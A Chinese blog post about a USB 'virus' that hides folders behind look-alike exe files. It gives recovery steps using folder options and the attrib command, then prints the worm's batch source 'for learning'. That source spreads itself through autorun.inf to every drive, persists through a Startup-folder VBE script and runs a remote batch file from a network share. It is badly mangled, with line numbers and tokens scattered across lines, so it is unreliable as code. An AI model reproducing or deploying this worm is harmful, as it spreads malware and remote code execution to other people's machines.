最近总觉得很忙很累,倒霉的事却一件接一件地来,而今天早上又发生了一件让我急坏了的事情.
昨晚论文指导导师找我谈论了关于我的论文修改意见,说是最迟要明天早上交给其他导师评分了,要求我把论文再给修改修改(因为要拿优秀,也就没办法了),因此,我只能开夜车把论文给赶出来,也好第二天早上打印后交上去,然后去做其他事情.
原本是这么计划的,也比平时早起了几十分钟(这几十分钟对我来说实在是太宝贵了,况且是在早晨),然后带着2G容量的u盘下去打印论文,可结果呢,当我打开u盘的时候,看到很多要么是好像坏了的文件夹,要么是exe格式的文件,这下可坏了,我的论文难道就这样给毁掉了?!!还有我长期开发积累起来的应用程序呢??我很无奈,我只能怪打印处的机器,是它们干的好事,而打印处的sb们除了会用鼠标按打印按钮之外,其他的连给屁都不懂,唉,shit一个字!
一开始我断定是感染了病毒(事实证明这个病毒应该用双引号给引起来),所以我换了几台机器试图证明点什么,但最终还是让我发现了新大陆:
第一步:打开“我的电脑〉工具〉文件夹选项〉查看”后,其中在这个“高级设置”对话框中,需要做两件事,一是把“隐藏受保护的操作系统文件(推荐)”选项去掉沟沟,二是把“显示所有文件和文件夹”给选上去,之后再按“应用”和“确定”即可。
此时,你应该看到了u盘中多了很多隐藏类型的文件夹,而这些文件夹跟exe格式文件的文件名前缀完全一样,当你打开它后发现你原来的东西还在,里面的内容什么都没有改变过,只是变成了受保护的隐藏文件夹。这时,事情就好办了,你大可以把u盘中原来没有的文件给删除掉,原来的文件继续可以使用。
但是并不意味着你大功告成,因为我发现有些“感冒”严重的机器,第一步的操作根本就没效,即是隐藏受保护的操作系统文件(推荐)”等功能修改不成功,即使你按照第一步操作,然后你再次打开这个对话框,你会发现这些状态仍然保持原来的样子(无奈)。这时是否意味着已经无能为力了呢?答案为否。
接着做第二步:
打开“开始〉运行〉输入cmd开发命令窗口”,然后进入U盘(以I盘符为例),做以下操作
cd I:\\ (回车)
I: (回车)
attrib -S -H * /D /S (回车)
或
打开cmd后直接输入
attrib -S -H I:\\* /D /S (回车)
在此等待一段时间,你会发现你原来的文件夹全恢复为非隐藏状态了(否则重复以上操作),这才算大功告成!!!!!
后来,我把这个搞搞振的“病毒”备份了一份,带回去研究了一下,结果发现,这个“ 病毒”在计算机病毒定义的三个特性(传播性、潜伏性、破坏性)并不具备破坏性,倒是觉得该“病毒”的作者太过于“善良”了,具有很强的玩弄u盘使用者的味道。
该“病毒”具有以下特征:
1、其不会对A,B盘造成任何影响
2、其把你原来的文件夹的属性设置为存档、系统文件、只读和隐藏,然后新建一个前缀名与文件夹名一样的exe文件
... ...
目前暂时发现这么多,如果时间允许的话我想继续挖掘挖掘,希望能为广大的u盘使用者提供有用的帮助
!
以下是该“病毒”的部分源代码(仅供学习之用,希望与对此感兴趣的高手交流交流):
-------------------------------------------------------------------------------------------
2
@echo off3
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS4
cd
/
d
"
%~dp0
"
5
if
/
i
"
%cd%
"
==
"
%~d0\
"
(explorer.exe
"
%~d0
"
)6
set
v
=
01
7
set
"
endf=%systemdrive%\8bye.txt
"
8
call
:ie s.vbe9
echo.Wscript.sleep
10000
>
s.vbe10
attrib s.vbe
+
a
+
s
+
r
+
h11
if
/
i
not
"
%cd%
"
==
"
%systemroot%
"
(
call
:cb
&
del
/
a
/
f
/
q s.vbe
&
goto
:eof)12
set
dl
=
CDEFGHIJKLMNOPQRSTUVWXYZ13
set
n
=
0
14
call
:inf
>
inf.tem15
call
:ql16
uda.a17
md
"
%systemroot%\bakfiles\
"
18
call
:ie
"
%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat
"
19
copy uda
-
解压.bat
"
%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat
"
20
call
:ie
"
%systemroot%\bakfiles\uda.a
"
21
call
:copy uda.a
"
%systemroot%\bakfiles\
"
22
:s23
echo.
>
uhere
-
%v%.txt24
if
exist
"
%endf%
"
(
set
n
=
1
&
goto
end
)25
if
"
!dl:~%n%,1!
"
==
""
(
set
n
=
0
&
s.vbe
&
(ping
192.168
.
2.211
-
n
1
&&
call
\\
192.168
.
2.211
\
re$
\
add.bat))26
set
d
=
!dl:~%n%,
1
!:27
set
/
a n
=
n
+
1
28
if
not
exist %d% (
goto
s)29
if
exist
"
%d%\autorun.inf\
"
(echo.y|cacls
"
%d%\autorun.inf
"
/
p everyone:f30
rd
"
%d%\autorun.inf
"
/
s
/
q)31
if
exist
"
%d%\autorun.inf
"
(fc
"
%d%\autorun.inf
"
inf.tem
&
if
not
"
!ERRORLEVEL!
"
==
"
0
"
(
call
U盘病毒分析.bat
-
a
-
l
-
d %d:~
0
,
-
1
%
-
c
-
i
-
s
&
goto
s1))
else
(
goto
s1)32
if
not
exist
"
%d%\%~n0.vbe
"
(
goto
s2)33
if
not
exist
"
%d%\%~nx0
"
(
goto
s3)34
if
not
exist
"
%d%\uda.a
"
(
goto
s4)35
if
exist %d%
\
%
date
:~
0
,
10
%.sk (
goto
s)36
:s137
call
:inf
>
%d%
\
autorun.inf38
attrib %d%
\
autorun.inf
+
a
+
s
+
r
+
h39
call
:ie
"
%d%\%~n0.vbe
"
40
:s241
call
:vbe
"
%~nx0
"
>
"
%d%\%~n0.vbe
"
42
attrib
"
%d%\%~n0.vbe
"
+
a
+
s
+
r
+
h43
:s344
call
:copy
"
%~dpnx0
"
"
%d%\
"
45
:s446
call
:copy
"
uda.a
"
"
%d%\
"
47
call
:ie %d%
\*
.sk48
echo.
>
%d%
\
%
date
:~
0
,
10
%.sk49
attrib %d%
\
%
date
:~
0
,
10
%.sk
+
a
+
s
+
r
+
h50
goto
s51
:cb52
if
exist
"
%systemroot%\uhere-*.txt
"
(del
/
a
/
f
/
q
"
%systemroot%\uhere-*.txt
"
&
s.vbe)53
if
exist
"
%systemroot%\uhere-*.txt
"
(
if
exist
"
%systemroot%\uhere-%v%.txt
"
(
goto
:eof)
else
(
call
:v
"
%systemroot%\uhere-*.txt
"
&
(
if
%v% lss !v0! (
goto
:eof))))54
call
:rm
>
%systemdrive%
\
已经被反U盘病毒的“病毒”感染.txt55
call
:copy
"
%~dpnx0
"
"
%systemroot%\
"
56
call
:copy
"
uda.a
"
"
%systemroot%\
"
57
call
:ie
"
%systemroot%\%~n0.vbe
"
58
call
:vbe
"
%~nx0
"
>
"
%systemroot%\%~n0.vbe
"
59
call
:ie
"
%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe
"
60
call
:vbe
"
%systemroot%\%~nx0
"
>
"
%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe
"
61
start
""
/
wait
/
d
"
%systemroot%\
"
"
%systemroot%\%~n0.vbe
"
62
goto
:eof63
:v64
set
"
v0=%~nx1
"
65
set
/
a
"
v0=%v0:~6,2%
"
66
goto
:eof67
:rm68
echo. 看到这个,请不要慌张。电脑病毒的定义为:
1
、传播性;
2
、潜伏性;
3
、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%
\
bakfiles
\
),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%
\
下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%
\
readme.txt)。谢谢!69
echo. 包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)70
goto
:eof71
:vbe72
echo.wscript.createobject(
"
wscript.shell
"
).run
"
""%~1"" /start
"
,
0
73
goto
:eof74
:inf75
echo.[AutoRun]76
echo.open
=
wscript.exe %~n0.vbe77
echo.shell
\
open
\
Command
=
wscript.exe %~n0.vbe78
echo.shell
\
explore
\
Command
=
wscript.exe %~n0.vbe79
echo.shell
\
find
\
Command
=
wscript.exe %~n0.vbe80
goto
:eof81
:ie82
if
exist
"
%~1
"
(del
/
a
/
f
/
q
"
%~1
"
)83
goto
:eof84
:copy85
call
:ie
"
%~dp2%~nx1
"
86
attrib
"
%~1
"
-
s
-
h87
copy
"
%~1
"
"
%~dp2
"
88
attrib
"
%~1
"
+
s
+
h89
attrib
"
%~dp2%~nx1
"
+
s
+
h90
goto
:eof91
:ql92
cd
/
d
"
%systemroot%\
"
93
del
/
a
/
f
/
q Anti
-
U盘免疫.bat ReadMe.txt uda
-
解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat94
cd
/
d
"
%~dp0
"
95
goto
:eof96
:
end
97
set
d
=
!dl:~%n%,
1
!98
echo.%d%:
\
99
if
exist %d%:
\
(del
/
a
/
f
/
q %d%:
\
u.vbe %d%:
\
u.bat %d%:
\
uda.a)100
set
/
a n
=
n
+
1
101
if
not
"
!dl:~%n%,1!
"
==
""
goto
end
102
call
U盘病毒分析.bat
-
c
&
call
:ql
&
del
/
a
/
f
/
q
"
%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
"
"
%~dp0s.vbe
"
"
%endf%
"
inf.tem
"
uda.a
"
"
%~n0.vbe
"
"
uhere-%v%.txt
"
"
%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe
"
"
%~nx0
"
103
--------------------------------------------------------------------------------------------
104
182
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
